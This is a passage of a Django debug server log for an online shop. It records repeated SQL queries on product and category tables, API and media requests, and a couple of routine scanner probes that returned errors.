"shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 10:39:24] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 10:39:53,365 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:39:53,369 utils 20136 140506667599616 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 10:39:53] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 10:40:15,678 utils 20136 140506667599616 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:40:15,684 utils 20136 140506667599616 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 10:40:15] "GET /api/v1/fire/ HTTP/1.0" 200 482 [16/Dec/2019 10:43:34] "GET / HTTP/1.0" 302 0 [16/Dec/2019 10:48:36] "GET / HTTP/1.0" 302 0 [16/Dec/2019 10:53:39] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 10:58:23,240 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:58:23,246 utils 20136 140506667599616 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 10:58:23] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 10:58:46,004 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:58:46,009 utils 20136 140506667599616 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 10:58:46] "GET /api/v1/fire/ HTTP/1.0" 200 482 [16/Dec/2019 11:00:01] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 11:00:10,973 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 11:00:10,977 utils 20136 140506667599616 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 11:00:10] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 11:01:10,361 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 11:01:10,365 utils 20136 140506667599616 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 11:01:10] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 11:02:22,530 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 11:02:22,534 utils 20136 140506667599616 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 11:02:22] "GET /api/v1/fire/ HTTP/1.0" 200 482 [16/Dec/2019 11:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 11:05:12,857 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 11:05:12,861 utils 20136 140506667599616 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 11:05:12] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 11:05:22,015 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 11:05:22,019 utils 20136 140506667599616 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 11:05:22] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 11:05:25,475 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 11:05:25,480 utils 20136 140506667599616 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 11:05:25] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 11:05:47,695 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 11:05:47,700 utils 20136 140506667599616 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 11:05:47] "GET /api/v1/fire/ HTTP/1.0" 200 482 [16/Dec/2019 11:05:48] "GET /media/products/2019/12/05/SampleGIFImage_350kbmb_vsJs0Zd.gif HTTP/1.0" 200 355854 [16/Dec/2019 11:05:48] "GET /media/products/2019/12/06/monika-grabkowska-zE6fKdd9QLI-unsplash.jpg HTTP/1.0" 200 3039441 [16/Dec/2019 11:05:48] "GET /media/products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg HTTP/1.0" 200 3337046 [16/Dec/2019 11:10:05] "GET / HTTP/1.0" 302 0 [16/Dec/2019 11:16:04] "GET / HTTP/1.0" 302 0 [16/Dec/2019 11:21:06] "GET / HTTP/1.0" 302 0 [16/Dec/2019 11:26:09] "GET / HTTP/1.0" 302 0 [16/Dec/2019 11:31:11] "GET / HTTP/1.0" 302 0 [16/Dec/2019 11:36:14] "GET / HTTP/1.0" 302 0 [16/Dec/2019 11:39:20] "GET / HTTP/1.0" 302 0 [16/Dec/2019 11:41:17] "GET / HTTP/1.0" 302 0 [16/Dec/2019 11:47:29] "GET / HTTP/1.0" 302 0 [16/Dec/2019 11:48:18] "GET / HTTP/1.0" 302 0 [16/Dec/2019 11:52:31] "GET / HTTP/1.0" 302 0 [16/Dec/2019 11:57:34] "GET / HTTP/1.0" 302 0 [16/Dec/2019 12:05:03] "GET / HTTP/1.0" 302 0 [16/Dec/2019 12:10:05] "GET / HTTP/1.0" 302 0 [16/Dec/2019 12:15:43] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [16/Dec/2019 12:18:29] "GET /proxy.php HTTP/1.0" 404 6629 [16/Dec/2019 12:20:45] "GET / HTTP/1.0" 302 0 [16/Dec/2019 12:25:48] "GET / HTTP/1.0" 302 0 [16/Dec/2019 12:30:50] "GET / HTTP/1.0" 302 0 [16/Dec/2019 12:35:02] "GET /whm-server-status HTTP/1.0" 301 0 [16/Dec/2019 12:38:20] "GET / HTTP/1.0" 302 0 [16/Dec/2019 12:43:23] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 12:44:06,964 utils 20136 140506432534272 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 12:44:06,970 utils 20136 140506432534272 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 12:44:06] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 12:44:13,112 utils 20136 140506432534272 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 12:44:13,117 utils 20136 140506432534272 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 12:44:13] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 12:47:05,315 utils 20136 140506432534272 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 12:47:05,328 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 12:47:05,334 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 12:47:05,337 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 12:47:05,341 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 12:47:05,344 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 12:47:05,347 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 12:47:05,350 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 12:47:05,353 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 12:47:05,359 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 12:47:05,363 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 12:47:05,367 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 12:47:05,371 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 12:47:05,374 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 12:47:05,377 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 12:47:05,380 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 12:47:05,382 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 12:47:05,384 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 12:47:05,387 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 12:47:05,392 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 12:47:05,394 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 12:47:05,397 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 12:47:05,400 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 12:47:05,402 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 12:47:05,405 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 12:47:05,409 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 12:47:05,412 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 12:47:05,414 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 12:47:05,416 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 12:47:05,419 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 12:47:05,422 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 12:47:05,424 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 12:47:05,427 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 12:47:05,429 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 12:47:05,431 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 12:47:05,435 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", 